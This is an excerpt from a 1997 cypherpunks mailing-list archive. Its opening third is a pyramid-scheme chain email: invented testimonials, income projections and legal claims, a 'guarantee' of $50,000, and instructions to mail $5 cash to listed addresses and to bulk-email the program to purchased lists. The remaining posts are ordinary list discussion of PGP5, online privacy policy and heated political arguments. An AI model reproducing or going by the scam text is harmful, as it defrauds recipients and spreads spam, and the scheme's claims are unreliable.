life.  You get out of life what you put into it.'  Through trial  and
error
and a somewhat slow frustrating start, I finally figured it out. The
program
works very well, I just had to find the right target group of people to
email it to.  So far this year, I have made over $63,000 using this
program.
I know my dad would have been very proud of me."

                                        Alan B., Philadelphia, PA

A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM

By the time you have read the enclosed information and looked over the
enclosed program and reports, you should have concluded that such a
program,
and  one that is legal,  could not have been created by an amateur.
Let me tell you a little about myself.  I had a profitable business for
ten
years.  Then in 1979 my business began falling off.  I was doing the
same
things that were previously successful for me, but it wasn't working.
Finally, I figured it out.  It wasn't me, it was the economy. Inflation
and
recession had replaced the stable economy that had been with us since
1945.
I don't have to tell you what happened to the unemployment
rate...because
many of you know from first hand  experience. There were more failures
and
bankruptcies than ever before.

The middle class was vanishing.  Those who knew what they were doing
invested wisely and moved up.  Those who did not, including those who
never
had anything to save or invest, were moving down into the ranks of the
poor.
As the saying goes, "THE RICH GET RICHER AND THE POOR  GET POORER."  The
traditional methods of making money will never allow you to "move up" or
"get rich", inflation will see to that.
You have just received information that can give you financial freedom
for
the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF EFFORT."
You can make more money in the next few months than you have ever
imagined.

I should also point out that I will not see a penny of your money, nor
anyone else who has provided a testimonial for this program.  I have
already
made over FOUR MILLION DOLLARS!  I have retired from the program after
sending out over 16,000 programs.  Now I have several offices which
market
this and several other programs here in the US and overseas.  By the
Spring,
we wish to market the 'Internet' by a partnership with AMERICA ON LINE.

Follow the program EXACTLY AS INSTRUCTED.  Do not change it in any way.
It works exceedingly well as it is now.  Remember to email a copy of
this
exciting program to everyone that you can think of.  One of the people
you
send this to may send out 50,000...and your name will be on every one of
them!.  Remember though, the more you send out, the more potential
customers
you will reach.

So my friend, I have given you the ideas, information, materials and
opportunity to become financially independent, IT IS UP TO YOU NOW!

"THINK ABOUT IT"

Before you delete this program from your mailbox, as I almost did, take
a
little time to read it and REALLY THINK ABOUT IT.  Get a pencil and
figure
out what could happen when YOU participate.  Figure out the worst
possible
response and no matter how you calculate it, you will still make a lot
of
money!  Definitely get back what you invested.  
Any doubts you have will vanish when your first orders come in.  IT
WORKS!

                                        Paul Johnson, Raleigh, NC

HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$

Let's say that you decide to start small, just to see how it goes, and
we'll
assume you and all those involved send out 2,000 programs each. Let's
also
assume that the mailing receives a .5% response.  Using a good list the
response could be much better.  Also many people will send out hundreds
of
thousands of programs instead of 2,000.  But continuing with this
example,
you send out only 2,000 programs.  With a 5% response, that is only 10
orders for REPORT #1.  Those 10 people respond by sending out 2,000
programs
each for a total of 20,000.  
Out of those .5%, 100 people respond and order REPORT #2.  Those 100
mail
out 2,000 programs each for a total of 200,000.  The .5% response to
that is
1,000 orders for REPORT #3.  Those 1,000 send out 2,000 programs each
for a
2,000,000 total.  The .5% response to that is 10,000 orders for REPORT
#4.
That's 10,000 five dollar bills for you. CASH!!!!  Your total income in
this
example is $50 + $500 + $5000 +$50,000 for a total of $55,550!!!!

REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU MAIL TO
WILL
DO ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM!  DARE TO THINK FOR A
MOMENT
WHAT WOULD HAPPEN IF EVERYONE  OR HALF SENT OUT 100,000 PROGRAMS INSTEAD
OF
ONLY 2,000.  
Believe me, many people will do that and more!  By the way, your cost to
participate in this is practically nothing.  You obviously already have
an
internet connection and email is FREE!!!  REPORT #3 will show you the
best
methods for bulk emailing and purchasing email lists.

THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY.  It does not
require
you to come in contact with people, do any hard work, and best of all,
you
never have to leave the house except to get the mail.  If you believe
that
someday you'll get that big break that you've been waiting for, THIS IS
IT!
Simply follow the instructions, and your dream will come true.  This
multi-level email order marketing program works perfectly...100% EVERY
TIME.
Email is the sales tool of the future.  Take advantage of this
non-commercialized method of advertising NOW!!  The longer you wait, the
more people will be doing business using email.  Get your piece of this
action!!

MULTI-LEVEL MARKETING (MLM) has finally gained respectability.  It is
being
taught in the Harvard Business School, and both Stanford Research and
The
Wall Street Journal have stated that between 50% and 65% of all goods
and
services will be sold throughout Multi-level Methods by the mid to late
1990's.  This is a Multi-Billion Dollar industry and of the 500,000
millionaires in the US, 20% (100,000) made their fortune in the last
several
years in MLM.  Moreover, statistics show 45 people become millionaires
everyday through Multi-Level Marketing.

INSTRUCTIONS

We at Erris Mail Order Marketing Business, have a method of raising
capital
that REALLY WORKS 100% EVERY TIME.  I am sure that you could use $50,000
to
$125,000 in the next 20 to 90 days.  Before you say "Bull", please read
the
program carefully.

This is not a chain letter, but a perfectly legal money making
opportunity.
Basically, this is what we do:  As with all multi-level business, we
build
our business by recruiting new partners and selling our products.  Every
state in the USA allows you to recruit new multi-level business
partners,
and we offer a product for EVERY dollar sent. YOUR ORDERS COME AND ARE
FILLED THROUGH THE MAIL, so you are not involved in personal selling. 
You
do it privately in your own home, store or office.

This is the GREATEST Multi-level Mail Order Marketing anywhere:

Step (1)   Order all four 4 REPORTS listed by NAME AND NUMBER.  Do this
by
ordering the REPORT from each of the four 4 names listed on the next
page.
For each REPORT, send $5 CASH and a SELF-ADDRESSED, STAMPED envelope
(BUSINESS SIZE #10) to the person listed for the SPECIFIC REPORT.
International orders should also include $1 extra for postage.  It is
essential  that you specify the NAME and NUMBER of the report requested
to
the person you are ordering from.  You will need ALL FOUR (4) REPORTS
because you will be REPRINTING and RESELLING them.
           DO NOT alter the names or sequence other than what the
instructions say.  IMPORTANT:  Always provide same-day service on all
orders.

Step (2)   Replace  the  name  and  address  under  REPORT #1  withyours,
moving the one that was there down to REPORT #2.           Drop  the name
and address under REPORT #2 to REPORT #3, moving the one that was there
to REPORT #4.  The name and           address that was under REPORT #4 is
dropped from the list and this party  is  no doubt on the way to the
bank.
When doing this, make certain you type the names and addresses
ACCURATELY!
DO NOT MIX UP MOVING PRODUCT/REPORT  POSITIONS!!!

Step (3)   Having made the required changes in the NAME list, save it as
a
text (.txt) file in it's own directory to be used with whatever email
program you like. Again, REPORT #3 will tell you the best methods of
bulk
emailing and acquiring email lists. Step (4)   Email a copy of the
entire
program (all of this is very important) to everyone whose address you
can
get your hands on. Start with friends and relatives since you can
encourage
them to take advantage of this  fabulous  money-making opportunity.
that's
what I did.  And they love me now, more than ever. Then, email to anyone
and
everyone!  Use your imagination! You can get email addresses from
companies
on the internet who specialize in email mailing lists.  These are very
cheap, 100,000 addresses for around $35.00.

IMPORTANT:  You won't get a good response if you use an old list, so
always
request a FRESH, NEW list. You will find out where to purchase these
lists
when you order the four 4 REPORTS.

ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!

REQUIRED REPORTS

***Order each REPORT by NUMBER and NAME***

ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE
AND $5 CASH FOR EACH ORDER REQUESTING THE
SPECIFIC REPORT BY NAME AND NUMBER
________________________________________________________
REPORT #1
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"

ORDER REPORT #1 FROM:
K&H ENTERPRISES
P.O. BOX 60366
LAS VEGAS, NV.
89160-0366

________________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

E & C Enterprises
11112 E. 13TH PL.
TULSA,OK. 74128

________________________________________________________
REPORT #3
"SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
EDCAL MARKETING
8125 E. 51ST. SUITE E
TULSA,OK 74145


________________________________________________________
REPORT #4
"EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:

C & B Enterprises
1110 W 131 STREET
JENKS, OK 74037
_______________________________________________________

CONCLUSION

.I am enjoying my fortune that I made by sending out this program. You
too,
will be making money in 20 to 90 days, if you follow the SIMPLE STEPS
outlined in this mailing.

To be financially independent is to be FREE.  Free to make financial
decisions as never before.  Go into business, get into investments,
retire
or take a vacation.  No longer will a lack of money hold you back.

However, very few people reach financial independence, because when
opportunity knocks, they choose to ignore it.  It is much easier to say
"NO"
than "YES", and this is the question that you must answer.  Will YOU
ignore
this amazing opportunity or will you take advantage of it? If you do
nothing, you have indeed missed something and nothing will change. 
Please
re-read this material, this is a special opportunity. If you have any
questions, please feel free to write to the sender of this information. 
You
will get a prompt and informative reply.

My method is simple.  I sell thousands of people a product for $5 that
costs
me pennies to produce and email.  I should also point out that this
program
is legal and everyone who participates WILL make money. This is not a
chain
letter or pyramid scam.  At times you have probably received chain
letters,
asking you to send money, on faith, but getting NOTHING in return, NO
product what-so-ever!  Not only are chain letters illegal, but the risk
of
someone breaking the chain makes them quite unattractive.

You are offering a legitimate product to your people.  After they purchase
the product from you, they reproduce more and resell them. It's simple
free enterprise.  As you learned from the enclosed  material, the PRODUCT is
a
series of four 4 FINANCIAL AND BUSINESS REPORTS.  
The information contained in these REPORTS will not only help you in
making
your participation in this program more rewarding, but will be useful to
you
in any other business decisions you make in the years ahead. You are
also
buying the rights to reprint all of the REPORTS, which will be ordered
from
you by those to whom you mail this program.  The concise one and two
page
REPORTS you will be buying can easily be reproduced at a local copy
center
for a cost off about 3 cents a copy.
Best wishes with the program and Good Luck!

"IT WAS TRULY AMAZING"

"Not being the gambling type, it took me several weeks to make up my
mind to
participate in this program.  But conservative as I am, I decided that
the
initial investment was so little that there was no way that I could not
get
enough orders to at least get my money back.  BOY, was I ever surprised
when
I found my medium sized post office box crammed with orders!  I will
make
more money this year than any ten years of my life before."

                                        Mary Riceland, Lansing, MI

TIPS FOR SUCCESS

Send for your four 4 REPORTS immediately so you will have them when the
orders start coming in.  When you receive a $5 order, you MUST send out
the
product/service to comply with US Postal and Lottery laws.  Title 18
Sections 1302 and 1341 specifically state that:  "A PRODUCT OR SERVICE
MUST
BE EXCHANGED FOR MONEY RECEIVED."

WHILE YOU WAIT FOR THE REPORTS TO ARRIVE:

1.      Name your new company. You can use your own name if you desire.

2.      Get a post office box (preferred).

3.      Edit the names and addresses on the program. You must remember,
your name and address go next to REPORT #1 and the others all       
move
down one, with the fourth one being bumped OFF the list.

4.      Obtain as many email addresses as possible to send until you
receive the information on mailing list companies in REPORT #3.

5.      Decide on the number of programs you intend to send out.  The
more you
send, and the quicker you send them, the more money  you will make.

6.      After mailing the programs, get ready to fill the orders.

7.      Copy the four 4 REPORTS so you are able to sent them out as 
soon as you
receive an order. IMPORTANT: ALWAYS PROVIDE    SAME-DAY SERVICE ON
ORDERS
YOU RECEIVE!

8.      Make certain the letter and reports are neat and legible.

YOUR GUARANTEE

The check point which GUARANTEES your success is simply this:  you must
receive 15 to 20 orders for REPORT #1.  This is a must!!!  If you don't
within two weeks, email out more programs until you do.  Then a couple
of
weeks later you should receive at least 100 orders for REPORT #2, if you
don't, send out more programs until you do.  Once you have received 100
or
more orders for REPORT #2, (take a deep breath) you can sit back and 
relax,
because  YOU  ARE  GOING TO  MAKE  AT  LEAST  $50,000. Mathematically 
it
is  a  proven  guarantee.   Of  those  who  have participated in the
program
and reached the above GUARANTEES-ALL have reached their $50,000 goal. 
Also,
remember, every time your name is moved down the list you are in front
of a
different REPORT, so you can keep track of your program by knowing what
people are ordering from you.
IT'S THAT EASY, REALLY, IT IS!!!

REMEMBER:
"HE WHO DARES NOTHING, NEED NOT HOPE FOR ANYTHING."
"INVEST A LITTLE TIME, ENERGY AND MONEY NOW OR
SEARCH FOR IT FOR THE REST OF YOUR LIFE."







From vipul at pobox.com  Thu Aug 21 04:49:28 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Thu, 21 Aug 1997 19:49:28 +0800
Subject: Katz, Wired, and Clueless Conferences on Cyberspace (fwd)
Message-ID: <199708191759.RAA04190@fountainhead.net>



Rishab Aiyer Ghosh wrote:

> Tim May wrote:
> >It seems that Jon Katz of "HotWired" (TM), or "Wired" (TM), or whatever, is
> >mightily impressed that he was invited to meet some bigwigs in Chicago to
> >chart the future of cyberspace.

> I don't know if Tim actually read all of it, or the second part,
> but Katz spent most of the two-part piece explaining why
> he _wasn't_ going to attend, and why no other "good guy"
> should attend this or similar conferences (quite apart from
> the truth about confs usually being just an excuse to schmooze).

> The second part also had a full list of invitees, which included
> Wired's Kevin Kelly (who Katz complained _is_ going) but, funnily
> enough, Esther's _not_ on there.

> Rishab
> ps. I'm not replying to the list, since I'm not on it.

> First Monday - The Peer-Reviewed Journal on the Internet 
> http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen

> Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh at firstmonday.dk) 
> Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
> A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces






From vipul at pobox.com  Thu Aug 21 05:25:10 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Thu, 21 Aug 1997 20:25:10 +0800
Subject: 3GW standards
Message-ID: <199708211730.RAA00629@fountainhead.net>



*** Battle over third generation wireless standards begins

In a scene reminiscent of Beta vs. VHS and Windows vs. Macintosh, a
technology battle among giant wireless industry manufacturers began
taking shape last week. The story, revealed in a report from
WirelessNOW, shows that makers of wireless gear are maneuvering for
position to set the standards for the next generation of wireless
Internet connectivity, multimedia applications and portable phone
services. What is precipitating this onslaught? Nothing less than the
control of a mega-billion dollar industry's future direction in what
is being called Third Generation Wireless (3GW) systems. (PR Newswire)
Story, http://www.infobeat.com/stories/cgi/story.cgi?id=4524154-d9f


-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces






From dformosa at st.nepean.uws.edu.au  Thu Aug 21 06:11:57 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Thu, 21 Aug 1997 21:11:57 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <3.0.3.32.19970819080948.009b9190@localhost>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 19 Aug 1997, Mike wrote:

[...]

> That thinking is backwards. If you sign with a DSS key, you will
> increase PGP5 usage,

I have no real interst into forceing the users into useing PGP5.  I do
have an interest in supporting the most commen crypotgrafic program.

> If you can't get access
> to at least one of those platforms, then you're not much of a
> cypherpunk, are you?

I can (and most like will) have access to PGP5, but its not for me that I
will be useing the old keys.  > > Mike.  > > -----BEGIN PGP SIGNATURE-----


- -- Please excuse my spelling as I suffer from agraphia see the url in my
header. Never trust a country with more peaple then sheep.  ex-net.scum
and proud You Say To People "Throw Off Your Chains" And They Make New
Chains For Themselves? --Terry Pratchett


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/wBuqQK0ynCmdStAQFYmgP/RWVK0Zbpw/DfXj21cIZ45+fkX3MgQlL2
0WDoToJlcTwefi7OwZTYYZp5k8OyjJuin8sYoPCbErOBkGlXcgRFqNvyu3SAoDM9
ndn7tBcQbFFfYsyMY5wNM5Z/g25bnvk1KWNE8u89iCP+tdqtkvCDVoa5ssPQtS3O
nBdM1CVMx6s=
=h59v
-----END PGP SIGNATURE-----






From JonWienk at ix.netcom.com  Thu Aug 21 07:58:01 1997
From: JonWienk at ix.netcom.com (Jonathan Wienke)
Date: Thu, 21 Aug 1997 22:58:01 +0800
Subject: CypherPunk Cults / Re: An end to "court appointed attorneys"
In-Reply-To: <199708210826.KAA14179@basement.replay.com>
Message-ID: <3.0.2.32.19970821074133.006c62a8@popd.netcruiser>



At 10:26 AM 8/21/97 +0200, Anonymous wrote:
>  If Tim is low on ammo, he would probably find it in his best interest
>to cover you while you make a break for yours. If he has plenty of ammo
>he might *choose* to do the same, for his own reasons.
>  I, for one, however, would not want to show up on his doorstep and
>tell him he was *obligated* to cover me while I attempted to get back
>the ammo I had given away when the government "required" it of me.
>  It's not because I think he's heartless. It's because I *don't*
>think he's *brainless*.
>
>TruthMonger
>"Who will help me load my Uzi?" said the Little Red Hen.

I will!

Jonathan Wienke

Founder and Charter Member, UziPunks Cult of One, a MLM Opportunity for the
international arms trafficker in all of us.

"We're adding a new dimension to the concept of a 'marketing tool.'"






From declan at well.com  Thu Aug 21 08:21:22 1997
From: declan at well.com (Declan McCullagh)
Date: Thu, 21 Aug 1997 23:21:22 +0800
Subject: Time Magazine cover story on privacy
Message-ID: 





---------- Forwarded message ----------
Date: Thu, 21 Aug 1997 08:08:08 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: Time Magazine cover story on privacy

Check out this week's Time Magazine for our cover story on online privacy,
written by Joshua Quittner with reporting by folks including Noah
Robischon and yours truly. 

A Time Magazine/Netly News special report on privacy, including the
magazine articles and back Netly stories is at: 

  http://time.com/reports/privacy

A Time/AllPolitics bulletin board discussion on privacy is at:

  http://cgi.pathfinder.com/cgi-bin/boards/read/11/5128

-Declan







From declan at well.com  Thu Aug 21 08:34:09 1997
From: declan at well.com (Declan McCullagh)
Date: Thu, 21 Aug 1997 23:34:09 +0800
Subject: Response to Time cover on privacy
Message-ID: 





---------- Forwarded message ----------
Date: Thu, 21 Aug 1997 08:18:14 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: Response to Time cover on privacy

Attached below is my response to a message criticizing the Time story. As
always, I don't speak for Time Inc. These views are mine and mine alone.

More info:
  http://pathfinder.com/netly/editorial/0,1012,1050,00.html

-Declan

---------- Forwarded message ----------
Date: Tue, 19 Aug 1997 12:27:59 -0700 (PDT)
From: Declan McCullagh 

[...]

My view is that many so-called "privacy" proposals are in fact
censorship in disguise. Society traditionally has allowed
people to share information about each other //without//
requiring that the speaker seek permission from a third party
first. This is a good thing: otherwise, journalists would go
out of business. Reporters -- as long as they don't violate
common law rights like copyright and defamation -- legally sell
personal information about individuals, for profit, all the
time. (I've written elsewhere how gossip plays a useful role in
every society and is not strictly regulated.)

We should extend these same principles and free speech
protections to the online world. Yet enemies of freedom argue
that as our society becomes more digital, we no longer deserve
some of the liberties we have enjoyed in more mundane times.
Such arguments led to the diluted free speech protections of
radio and TV broadcasting and the passage of the Communications
Decency Act.

Now we're hearing similar calls for abridged electronic
freedoms in the name of preserving them. Some have argued that
private firms sharing information about individuals, or
recording information your web browser supplies, are such a
threat to society that new laws are needed to restrict their
actions and muzzle their speech. And, of course, a new Federal
Privacy Commission!

This schizophrenic approach means trusting the federal
government to shield our privacy -- even though the same people
are engaged in an increasingly fierce attack on it. (It also
ignores the very real differences between government collection
and use of databases compared to private ones.) Bill Clinton is
the Clipper Chip president, the Digital Telephony guy. His
administration's bureaucrats fight harder to maintain crypto
export controls than any other. Then there's last year's
anti-terrorism bill, the push for roving and multipoint
wiretaps, and the FBI's itch to ban nonescrowed domestic
crypto. Let's not forget the administration's quest for
enormous voracious databanks that will be tied together --
airport security, travel records, national ID cards.

These bureaucrats are supposed to protect our privacy?

This is the same president whose policies ACLU legislative
counsel Don Haines decries as "the Clinton-Gore effort to
hardwire Big Brother into the information age." The ACLU even
boycotted the June FTC conference, calling it a sham that
wouldn't lead to any substantive "privacy protection" rules.

THESE bureaucrats are supposed to protect our privacy?

I have, I suppose, two more objections to a privacy agency.
First, it would be a likely beachhead for those who would
restrict free speech in the name of privacy. Second, who would
be on this commission? Prof. Westin, whose positions you
criticize? The DMA? Could we expect such an anti-privacy
president as Clinton to appoint anyone who would do a
reasonable job of reining in the Justice Department and other
police agencies? Such an office is far more likely to serve as
a front for anti-privacy forces inside the administration, much
as NIST may front for NSA. In fact, a privacy agency may well
//hurt// privacy, for if a co-opted privacy agency backs a
bad bill, that endorsement will make it more difficult for
others to criticize the measure.

As for governments with privacy agencies, you hold up the
example of some European countries. But these same countries
have unjust policies that restrict free speech in the name of
protecting privacy. That's hardly a tradeoff I can accept.

Our modern "right to privacy" is a relatively recent invention
in the U.S. Many privacy rights mostly date from an influential
1890 law review article co-authored by soon-to-be Justice
Brandeis. In it, Brandeis and Warren argued that newspapers
went too far and printed offensive information. But absent from
their analysis was any consideration of how creating new rights
to restrict the press would restrict free speech.

Brandeis and Warren wanted to create a new property right in
personal information. But this position is no more
philosophically coherent -- and consistent with the principles
of a free society -- than would be a rule establishing a
"property right" in information about your appearance. (Then,
presumably, if someone were to talk about you behind your back --
even if the gossipmongering were true! -- you could sue.) Not to
mention that it's directly opposed to traditional views of
property rights.

Don't get me wrong: the government has an important place in
society. The state should provide such vital functions as law,
police, and courts. Criticisms of a new federal agency are
hardly based on opposition to government in principle. You're
thinking about anarchism, which I don't support. (Locke had it
right: There can be no liberty without law.)

Sure, I'm not overjoyed by the databasification of American
society. I feel uneasy about Equifax and TRW-type databases. I
abhor Safeway's discount card program that links my identity
with my shopping habits. But just as I detest holocaust
deniers, NAMBLA supporters, and homophobes, I recognize they
have a right to speak. So, generally, does Safeway have a right
to enact anti-privacy policies.

Transactional privacy is not a right but a preference. For
example, free speech is a right that strictly limits the
government's ability to control what you say. We must demand a
similar right of privacy from the government. But I give up my
free speech "rights" when I voluntarily attend a college with a
wacky speech code or go to work at a company with strict
workplace speech policies. Similarly, I give up my privacy
"rights" when I voluntarily go to unknown web sites, apply to
rent an apartment where a credit check is required, or post to
Usenet, etc. I have no general "right" to bar others from
sharing informtion about me, even if it's behind my back. (To
invent such a "right" would violate their free speech rights.)

If consumers //want// privacy -- and I believe they do -- then
they'll turn to businesses that provide and protect it. Perhaps
I'll take my business from Safeway to Giant since I can get a
discount card without giving my true name. In this way privacy
becomes one of the many factors -- along with quality of
merchandise, reliability, and price -- that consumers consider
when they enter into a transaction. In other words: privacy can
be protected by contract and common law. Advocacy groups are
particularly well-poised to educate individuals and raise
consciousness. Privacy flareups like Lexis-Nexis, AOL, and UPS
have shown it's possible. Companies often will react to a
public outcry by changing policies.

If they don't, then privacy-sensitive customers will respond,
and the market will remedy its own problems -- without the
intervention of bureaucrats or federal privacy agencies.

-Declan








From gturk at concentric.net  Thu Aug 21 08:40:27 1997
From: gturk at concentric.net (gturk at concentric.net)
Date: Thu, 21 Aug 1997 23:40:27 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <199708210826.KAA14179@basement.replay.com>
Message-ID: <3.0.3.32.19970821112449.00973890@pop3.concentric.net>



TruthMonger wrote:

>  Tim speaks of those who feel it is their duty/right to "collect
>tribute from those who don't want to make the contribution freely."

You must be referring to the Cult of Redistribution.

"A Fatal Tendency of Mankind

"Self-preservation and self-development are common aspirations among all
people.  And if everyone enjoyed the unrestricted use of his faculties and
the free disposition of the fruits of his labor, social progress would be
ceaseless, uninterrupted, and unfailing.

"But there is also another tendency that is common among people.  When
they can, they wish to live and prosper at the expense of others.  This is
no rash accusation.  Nor does it come from a gloomy and uncharitable
spirit.  The annals of history bear witness to the truth of it: the
incessant wars, mass migrations, religious persecutions, universal
slavery, dishonesty in commerce, and monopolies.  This fatal desire has
its origin in the very nature of man -- in that primitive, universal, and
insuppressible instinct that impels him to satisfy his desires with the
least possible pain."

-- Bastiat, "The Law", June 1850







From rah at shipwright.com  Thu Aug 21 08:47:22 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 21 Aug 1997 23:47:22 +0800
Subject: Soon the neighbor's dog will be in the act...(Was Re: book talktoday)
Message-ID: 




--- begin forwarded text


X-PGP-Key: 
X-Sender: rodney at pop3.pn.com
Date: Thu, 21 Aug 1997 09:25:50 -0400
To: dcsb at ai.mit.edu
From: Rodney Thayer 
Subject: book talk today
Mime-Version: 1.0
Sender: bounce-dcsb at ai.mit.edu
Precedence: bulk
Reply-To: Rodney Thayer 

I was in SoftPro in Burlington (the bookstore) last night and saw they are
having an "Internet Cryptography Seminar" today at 6pm, "featuring Dr.
Richard E. Smith, author of "Internet Cryptography".

I wonder if he'll be digitally signing copies of the book :-)

For help on using this list (especially unsubscribing), send a message to
"dcsb-request at ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From sunder at brainlink.com  Thu Aug 21 09:07:01 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 22 Aug 1997 00:07:01 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <19970820222934.23073@bywater.songbird.com>
Message-ID: 



On Wed, 20 Aug 1997, Kent Crispin wrote:

> One wonders if there is a microscope powerful enough to resolve Tim 
> May's heart.

Meethinks (not speaking for Tim) that years under a fascist natzi-like
regime bent on ripping out all out freedoms one by one and confiscating
all things threatening to it would cause any awake person to lose any
compassion for the scum that run our Freeh country.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From jya at pipeline.com  Thu Aug 21 09:28:28 1997
From: jya at pipeline.com (John Young)
Date: Fri, 22 Aug 1997 00:28:28 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
Message-ID: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com>



gturk wrote:

>You must be referring to the Cult of Redistribution.

Tis true that as these accusatory options for blaming others
are displayed here, it becomes hard to tell who's potshotting from
what shifting position to gain better fire lines at friend and
foe and own foot.

As the Bastiat quote shows, the 19th century is a fount of
apologies for wizened rapacity, as are those stuck in that time warp
of heyday national and indiivudal self-destruction in the cause of 
unshakeable rigteousness, an affliction far from cured in nations and
individuals wanting to be Number One while totally whacked
out on ... take your pick from the socio-politico-econo bazaar,
most of which derives from the days of pre-Bastiat and now 
recycled by crazy-lazy-minded 20th century rip-offers of the
insecurely rich.

Will evolution in action ever kick in, or will the promise of it,
like dreams of social justice and faith in the constitution and arms, 
forever cheat the maniacally despairing with so few other choices
for peace of mind?

Are there any reliable prefabricated alternatives from history, from
today, to self-imposed sheepledom of your sole invention?

Now, to move on to the day's news: Is Tim going to be kidnapped
by a gang of mixed breed cops and ammo merchants, shot instantly
and chained in dugout till his loved redeems his maggoty carcass by
redistributing his nestegg? That's the topic of the NYT's lead business 
story today, the need for secret ransom insurance, so secret that it 
does not make you a free-for-taking target like the usual unwise display 
of peacockery.

Hide it if you got it, hide your lush affiliations too, the poor reporters 
advise, or the world's scum with nothing else to do but watch and wait 
are gonna snag your unsmart ass when you least expect it, now as in 
ages past, unless, to be sure, more scum-world guardians are hired 
and more big-nuke prayerbooks and ransom policys are arsenaled 
bedside, 4X, ankle and thigh.






From zooko at xs4all.nl  Thu Aug 21 10:27:03 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Fri, 22 Aug 1997 01:27:03 +0800
Subject: heart
Message-ID: <199708211706.TAA00218@xs1.xs4all.nl>




 A million monkeys operating under the pseudonym
 "Ray Arachelian " typed:
>
> Meethinks (not speaking for Tim) that years under a fascist natzi-like
> regime bent on ripping out all out freedoms one by one and confiscating
> all things threatening to it would cause any awake person to lose any
> compassion for the scum that run our Freeh country.


BULL SHIT.


This is a cop-out, used by emotionally stunted men to excuse 
themselves from their solemn responsibility to ethically 
justify their own actions and to deal fairly with their fellow
humans.


By reciting mantras to one another emphasizing their sense of 
having been mistreated and their sense of having 
_unquestionable_ moral superiority, people in this situation 
persuade each other to become more and more fanatical in their 
attitudes, less and less in touch with reality, and less and 
less compassionate towards the "others" who have been demonized
in the process.


Note that this process _always_ includes a group of other 
humans which are demonized in order to serve as a scapegoat and
as a concrete focus for the participant's negative emotions.


This process is objectively identical to the process 
experienced by _all_ hate groups, gangs and nationalists.


You are standing in the auditorium, Louis Freeh's face is 
displayed on the screen, interposed with film of jackbooted 
thugs breaking down your door, and you are screaming wordlessly
at him along with all of your brethren during the Two Minutes 
Hate.



THAT should give you pause for thought, Ray.







Listen to me:  I might take up arms in the trenches next to you
someday, if it comes to that.  I might murder enemies or 
civilians in their sleep, if I were convinced that it was the 
only way to preserve the people and the ideals that I love.  
I might work to deploy ideas and technologies that threaten to
induce social chaos, if I believed that those ideas and 
technologies were the only way to ensure the blessings of 
liberty and prosperity for my children.


But I will _never_ take one of these actions while intoxicated
by a cloud of hatred and self-righteousness.  I will _never_ 
tell myself that I am part of a sacred jihad which absolves me
of all guilt, and I will _never_ re-classify my enemies as 
sub-human in order to justify my treatment of them.




So take a fucking BREAK man.  Just get up from the computer and
go for a fucking walk in the mountains and think about your 
fucking family and loved ones.




Z






From whgiii at amaranth.com  Thu Aug 21 10:33:51 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Fri, 22 Aug 1997 01:33:51 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <3.0.3.32.19970819080948.009b9190@localhost>
Message-ID: <199708211719.MAA08114@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.3.32.19970819080948.009b9190 at localhost>, on 08/19/97 
   at 08:09 AM, Mike  said:

> Anybody is able
>to run PGP5 today on Win32/Mac/Linux. If you can't get access to at least
